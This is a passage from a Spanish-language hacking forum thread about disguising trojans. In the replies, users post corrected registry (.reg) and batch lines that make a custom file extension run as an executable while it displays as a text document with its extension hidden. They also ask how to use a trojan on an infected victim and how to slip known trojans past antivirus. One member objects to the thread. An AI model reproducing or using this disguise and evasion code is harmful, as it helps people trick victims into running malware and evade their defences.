 Autor
|
Tema: Ocultación de troyanos (Leído 56,750 veces)
|
|
|
valerossy46
 Desconectado
Mensajes: 1
|
tengo un serio problema. he exo to lo q aqui se explica, sin nigun tipo de problema con los ejecutables normales (los d programas, como x ejemplo los clientes), pero si con los servidores, me hace algo muy extraño, es como si al ejecutarlo (q no lo ejecuta) descomprime una copia en el mismo directorio con la extension q yo le haya puesto. necesito ayuda ya no tengo ni idea de x q puede ser. muxas gracias.
|
|
|
|
|
En línea
|
|
|
|
PxM
Desconectado
Mensajes: 309
[PxM]
|
Pero es que no entiendo.... leo y leo el post y comprendo que es necesario contaminar el sistema... si, pero para contaminarlo se necesita un ejecutable o hacerlo a mano, (como ejecutable tomo también a .bat y .reg), ésto ya lo había pensado pero por lo mismo lo descarté... éso de las extensiones del registro modificadas para reconocer una extención "x" como ejecutable no puede ser sin que antes se haya "contaminado"... Pero ¡Si se contamina con un ejecutable!... que sería lo mismo que mandar el troyanito en exe... ¿no?
...
Lo de que cambies la extensión del troyano no tiene efecto en el antivirus al parecer ya que lo scannea igual.
|
|
|
|
|
En línea
|
|
|
|
Zorrohack
Desconectado
Mensajes: 855
Quisiera burlar la enfermedad asi como a los AVs
|
 oye Brujo y Creature hay una parte del codigo .reg que esta mal es donde dice: REGEDIT4 [HKEY_CLASSES_ROOT\.troj] @="trojfile" [HKEY_CLASSES_ROOT\trojfile] @="Documento de texto" "NeverShowExt"="" [HKEY_CLASSES_ROOT\trojfile\Shell\Open\Command] @=""%1" %*" esta parte del @=""%1" %*" esta mal ya que ese ese no es el valor que se debe escribir para que sea ejecutable,se debe escribir asi: @="\"%1\" %*" asi es que se escribira el valor para que se ejecute noten que si lo hacen de la otra manera el troyano nunca se ejecutara Perdonen que corrija al ADM. ajajaja que facil !!!
|
|
|
|
|
En línea
|
Progresamos porque hay Millones de imbeciles, maldicion jodi a McAfee,Panda,Kav,Norton, perdonen solo practicaba.
|
|
|
|
|
Thehacky
Desconectado
Mensajes: 5
|
;)Oye Brujo encontre una manera de no tener que poner en hexadecimal esta parte:
@echo @=""%1" %*">>%TEMP%\troj.reg
solo pon lo siguiente:
@echo @="%%%11">>%TEMP%\-.reg
Ni tampoco esto:
@echo @="%SystemRoot%\system32\shell32.dll,-152">>%TEMP%\troj.reg
En vez de eso pon:
@echo @="shell32.dll,-152">>%TEMP%\-.reg
|
|
|
|
|
En línea
|
|
|
|
Thehacky
Desconectado
Mensajes: 5
|
 ¿Quién ese estupido Anarko? Oye amigo conozco novatos pero tu te pasas!!!!!!!! Que tonto!!!
|
|
|
|
|
En línea
|
|
|
|
yhosi
Desconectado
Mensajes: 2
|
brujo!!!! decime una cosa, despues que mi troyano ya infecto la maquina de la victima, como hago para usarlo?
|
|
|
|
|
En línea
|
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 279
No tenes nada mas interesante que leer que esto?
|
como uso el troyan??? dios mio... en que se ha convertido este foro.... brujo sinceramente no veo cual es la necesidad de publicar un texto asi, si sabes muy bien que clase de personas lo van a leer y que clase de uso le van a dar.. despues se quejan la mala fama que tienen lo hackers en la comunidad (Que los confunden que lammers o como sea que les digan), si seguimos asi no llegamos a ningun lado
|
|
|
|
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
byebye
Desconectado
Mensajes: 5.093
|
tu no sabes el dicho "toda informacion es poca"?, es como todo, el texto esta como informacion y para el que le interese. si sabes la forma que tienen de ocultarlos sabras como detectarlos ¿no crees?.
|
|
|
|
|
En línea
|
|
|
|
|
 |
jeejj me parece muy completo la explicacion de como ocultar troyanois no cabe duda que esta actualizado, en cambio les manifiesto que hay muchas otras maneras como pueden ser en un archivo txt o cacmuflageandolo o dropeandolo con metos muy buenos y hay que saber trabajrlos y ocultar muy bien sui cadena para que no sean detectados por los antivirus. felicitaciones al hacker net por este documento y em gustaria saber si a un server de troyanos ya conocidos como pueden ser ptakks sub7 o duck toys seles pueden cambiar esta cadena que nosea camuflageandolo. gracias 
